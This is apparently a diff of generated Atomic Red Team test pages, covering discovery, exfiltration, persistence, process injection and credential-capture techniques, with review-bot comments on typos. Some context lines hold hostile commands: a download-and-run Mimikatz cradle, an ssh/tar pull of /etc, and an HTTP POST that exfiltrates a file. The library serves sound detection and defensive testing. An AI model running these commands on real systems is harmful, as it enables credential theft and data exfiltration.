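Review bot: "capture 5 packets on interface en0A" looks like a typo for "en0", the usual primary interface name on macOS; the hunk shows an Inputs section follows, so check the interface input's default and make the description match it (or say "on the interface given by the interface input").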
@@ -112,16 +116,18 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
<br/>
## Atomic Test #3 - Packet Capture Windows Command Prompt
auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
installed.
Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
**Supported Platforms:** Windows
**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
#### Inputs:
@@ -173,14 +179,16 @@ Start-Process $env:temp\npcap_installer.exe
<br/>
## Atomic Test #4 - Windows Internal Packet Capture
auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528
Uses the built-in Windows packet capture
After execution you should find a file named trace.etl and trace.cab in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+20 -12
View File
@@ -18,15 +18,17 @@ Within cloud environments, adversaries may attempt to discover services running
<br/>
## Atomic Test #1 - Port Scan
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
Scan ports to check for listening ports.
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
@@ -49,15 +51,17 @@ done
<br/>
## Atomic Test #2 - Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
#### Inputs:
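Review bot: "a single or range of adresseses" misspells "addresses"; suggest "a single address or a range of addresses on port 80". Fix in the YAML description.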
@@ -98,13 +102,15 @@ echo "Install nmap on the machine to run the test."; exit 1;
<br/>
## Atomic Test #3 - Port Scan NMap for Windows
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
Scan ports to check for listening ports for the local host 127.0.0.1
**Supported Platforms:** Windows
**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
#### Inputs:
@@ -143,13 +149,15 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
<br/>
## Atomic Test #4 - Port Scan using python
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
Scan ports to check for listening ports with python
**Supported Platforms:** Windows
**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
#### Inputs:
+40 -24
View File
@@ -26,14 +26,16 @@ An adversary can use WMI to interact with local and remote systems and use it as
<br/>
## Atomic Test #1 - WMI Reconnaissance Users
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
An adversary might use WMI to list all local User Accounts.
When the test completes , there should be local user accounts information displayed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
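Review bot: "When the test completes , there should be" has a space before the comma; the same spacing error appears in Atomic Test #2 below. Fix both in the YAML descriptions.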
@@ -53,14 +55,16 @@ wmic useraccount get /ALL /format:csv
<br/>
## Atomic Test #2 - WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
**Supported Platforms:** Windows
**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -80,14 +84,16 @@ wmic process get caption,executablepath,commandline /format:csv
<br/>
## Atomic Test #3 - WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
**Supported Platforms:** Windows
**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -107,17 +113,19 @@ wmic qfe get description,installedOn /format:csv
<br/>
## Atomic Test #4 - WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreacheable
**Supported Platforms:** Windows
**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
#### Inputs:
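Review bot: "a service information will be displayed" should be "service information will be displayed", "unreacheable" should be "unreachable", and the sentence beginning "A common error message is" has no terminal period. Fix in the YAML description.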
@@ -143,14 +151,16 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
<br/>
## Atomic Test #5 - WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
This test uses wmic.exe to execute a process on the local host.
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
**Supported Platforms:** Windows
**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
#### Inputs:
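Review bot: "When the test completes , a new process will be started locally .A notepad application" has misplaced spaces around both punctuation marks; suggest "When the test completes, a new process will be started locally. A Notepad application will be started when the input is left at its default." Fix in the YAML description.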
@@ -179,15 +189,17 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
<br/>
## Atomic Test #6 - WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
#### Inputs:
@@ -219,9 +231,6 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
<br/>
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand <encoded command>
Where the EncodedCommand, once decoded, would resemble:
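Review bot: the `<encoded command>` placeholder in "Powershell -nop -exec bypass -EncodedCommand <encoded command>" will be treated as an HTML tag by Markdown renderers and disappear from the rendered page; wrap the whole command line in backticks or escape the angle brackets as `&lt;encoded command&gt;`. Since this file is generated, apply the change in the YAML description.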
@@ -229,9 +238,14 @@ Where the EncodedCommand, once decoded, would resemble:
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
**Supported Platforms:** Windows
**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
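Review bot: the link text says "Solarigate" while the linked Microsoft URL and the name used by Microsoft is "Solorigate"; use one spelling consistently (the previous hunk's first sentence also uses "Solarigate"). Fix in the YAML description so the regenerated doc is consistent.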
@@ -251,14 +265,16 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
<br/>
## Atomic Test #8 - Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
**Supported Platforms:** Windows
**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
#### Inputs:
+25 -15
@@ -20,15 +20,17 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
<br/>
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
#### Run it with these steps!
@@ -56,15 +58,17 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
<br/>
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e
Exfiltration of specified file over ICMP protocol.
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
#### Inputs:
@@ -90,13 +94,15 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
<br/>
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
Exfiltration of specified file over DNS protocol.
**Supported Platforms:** Linux
**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
#### Run it with these steps!
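Review bot: unlike the sibling tests in this file, the DNS description is only "Exfiltration of specified file over DNS protocol." and carries no "Upon successful execution ..." sentence saying which tool runs or what a tester should observe. Add that sentence to the test's YAML description so the generated page states the expected outcome.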
@@ -122,14 +128,16 @@ Exfiltration of specified file over DNS protocol.
<br/>
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
#### Inputs:
@@ -156,14 +164,16 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
<br/>
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
#### Inputs:
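Review bot: "exfiltrateto" in the description line is missing a space ("exfiltrate to"). Since this Markdown is generated, the fix belongs in the test's YAML description rather than here.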
+10 -6
@@ -16,17 +16,19 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
<br/>
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988
Input a domain and test Exfiltration over SSH
Remote to Local
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
#### Inputs:
@@ -51,17 +53,19 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
<br/>
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
Input a domain and test Exfiltration over SSH
Local to Remote
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
#### Inputs:
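Review bot: the description "tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output" is garbled and does not tell a tester what to expect. Reword it in the YAML description so it states plainly that tar compresses /Users/* and that a password-protected archive named `Users.tar.gz.enc` is written as the output.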
+20 -12
@@ -20,15 +20,17 @@ Utilities and commands that acquire this information include [netstat](https://a
<br/>
## Atomic Test #1 - System Network Connections Discovery
auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
@@ -50,15 +52,17 @@ net sessions
<br/>
## Atomic Test #2 - System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
@@ -78,15 +82,17 @@ Get-NetTCPConnection
<br/>
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
Get a listing of network connections.
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -119,15 +125,17 @@ echo "Install netstat on the machine."; exit 1;
<br/>
## Atomic Test #4 - System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
Get a listing of network connections, domains, domain users, and etc.
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
#### Inputs:
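Review bot: the second description line "sharpview.exe located in the bin folder, an opensource red-team tool." is a sentence fragment, and "and etc." in the first line is redundant. Rewrite both in the YAML description (for instance "SharpView.exe, an open-source red-team tool, is located in the bin folder"), since this page is generated from it.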
+5 -3
@@ -12,13 +12,15 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
<br/>
## Atomic Test #1 - At - Schedule a job
auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e
This test submits a command to be run in the future by the `at` daemon.
**Supported Platforms:** Linux
**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
#### Inputs:
+5 -3
@@ -14,16 +14,18 @@ Note: The <code>at.exe</code> command line utility has been deprecated in curren
<br/>
## Atomic Test #1 - At.exe Scheduled task
auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
**Supported Platforms:** Windows
**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+15 -9
@@ -16,13 +16,15 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute
<br/>
## Atomic Test #1 - Cron - Replace crontab with referenced file
auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
#### Inputs:
@@ -53,13 +55,15 @@ crontab /tmp/notevil
<br/>
## Atomic Test #2 - Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
#### Inputs:
@@ -95,13 +99,15 @@ rm /etc/cron.weekly/#{cron_script_name}
<br/>
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
#### Inputs:
+5 -3
@@ -12,13 +12,15 @@ An adversary may use the <code>launchd</code> daemon in macOS environments to sc
<br/>
## Atomic Test #1 - Event Monitor Daemon Persistence
auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
**Supported Platforms:** macOS
**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
#### Inputs:
+30 -18
@@ -24,14 +24,16 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
<br/>
## Atomic Test #1 - Scheduled Task Startup Script
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
@@ -57,13 +59,15 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
<br/>
## Atomic Test #2 - Scheduled task Local
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** Windows
**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
#### Inputs:
@@ -93,15 +97,17 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
<br/>
## Atomic Test #3 - Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
**Supported Platforms:** Windows
**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
#### Inputs:
@@ -134,15 +140,17 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
<br/>
## Atomic Test #4 - Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** Windows
**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
@@ -171,14 +179,16 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
<br/>
## Atomic Test #5 - Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
**Supported Platforms:** Windows
**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
#### Inputs:
@@ -222,13 +232,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
<br/>
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
**Supported Platforms:** Windows
**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
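Review bot: "Create an scheduled task" in the description should read "Create a scheduled task"; fix it in the test's YAML description, from which this Markdown is generated.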
+5 -3
@@ -14,13 +14,15 @@ An adversary may use systemd timers to execute malicious code at system startup
<br/>
## Atomic Test #1 - Create Systemd Service and Timer
auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b
This test creates Systemd service and timer then starts and enables the Systemd timer
**Supported Platforms:** Linux
**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
#### Inputs:
+10 -6
@@ -14,13 +14,15 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
<br/>
## Atomic Test #1 - ListCronjobs
auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
#### Inputs:
@@ -45,13 +47,15 @@ kubectl get cronjobs -n #{namespace}
<br/>
## Atomic Test #2 - CreateCronjob
auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
#### Inputs:
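Review bot: this description is identical, word for word, to the ListCronjobs description in the previous hunk, so neither page says what distinguishes the two tests; only the headings carry the difference (listing existing CronJobs versus creating one). Add a sentence to each YAML description stating what the test does and what a tester should see, as the other tests in this commit do with their "Upon successful execution ..." line.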
+5 -3
@@ -16,16 +16,18 @@ Running code in the context of another process may allow access to the process's
<br/>
## Atomic Test #1 - Process Injection via mavinject.exe
auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
**Supported Platforms:** Windows
**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
#### Inputs:
+5 -3
@@ -16,9 +16,6 @@ Running code in the context of another process may allow access to the process's
<br/>
## Atomic Test #1 - Process Injection via C#
auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
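Review bot: "Excercises" in the last context line is misspelled ("Exercises"). Fix it in the test's YAML description, since this Markdown is generated from it.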
@@ -28,9 +25,14 @@ Excercises Five Techniques
4. IatInjection
5. ThreadHijack
Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
#### Inputs:
+10 -6
@@ -16,14 +16,16 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
<br/>
## Atomic Test #1 - Process Hollowing using PowerShell
auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
**Supported Platforms:** Windows
**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
#### Inputs:
@@ -57,13 +59,15 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
<br/>
## Atomic Test #2 - RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
This module executes notepad.exe from within the WINWORD.EXE process
**Supported Platforms:** Windows
**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
#### Inputs:
+10 -6
@@ -16,17 +16,19 @@ More sophisticated samples may perform multiple process injections to segment mo
<br/>
## Atomic Test #1 - Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
**Supported Platforms:** Windows
**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
@@ -65,16 +67,18 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
<br/>
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
**Supported Platforms:** Windows
**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
#### Inputs:
+10 -6
@@ -20,17 +20,19 @@ Keylogging is the most prevalent type of input capture, with many different ways
<br/>
## Atomic Test #1 - Input Capture
auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
**Supported Platforms:** Windows
**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
#### Inputs:
@@ -60,17 +62,19 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
<br/>
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d
auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
**Supported Platforms:** Linux
**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
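Review bot: "Pluggable Access Module" in the first description line is not what PAM stands for; it is Pluggable Authentication Modules. "privledges" on the same line is also misspelled ("privileges"). Both fixes belong in the test's YAML description, from which this page is generated.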
+10 -6
@@ -14,14 +14,16 @@ Adversaries may mimic this functionality to prompt users for credentials with a
<br/>
## Atomic Test #1 - AppleScript - Prompt User for Password
auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
**Supported Platforms:** macOS
**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
@@ -41,15 +43,17 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
<br/>
## Atomic Test #2 - PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+5 -3
@@ -15,13 +15,15 @@
<br/>
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
Hooks functions in PowerShell to read TLS Communications
**Supported Platforms:** Windows
**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
#### Inputs:
+10 -6
@@ -14,15 +14,17 @@ In Windows environments, adversaries could obtain details on running processes u
<br/>
## Atomic Test #1 - Process Discovery - ps
auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc
Utilize ps to identify processes.
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
#### Inputs:
@@ -52,15 +54,17 @@ rm #{output_file}
<br/>
## Atomic Test #2 - Process Discovery - tasklist
auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
Utilize tasklist to identify processes.
Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
+90 -54
@@ -50,13 +50,15 @@ PowerShell commands/scripts can also be executed without directly invoking the <
<br/>
## Atomic Test #1 - Mimikatz
auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
#### Inputs:
@@ -81,15 +83,17 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
<br/>
## Atomic Test #2 - Run BloodHound from local disk
auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
#### Inputs:
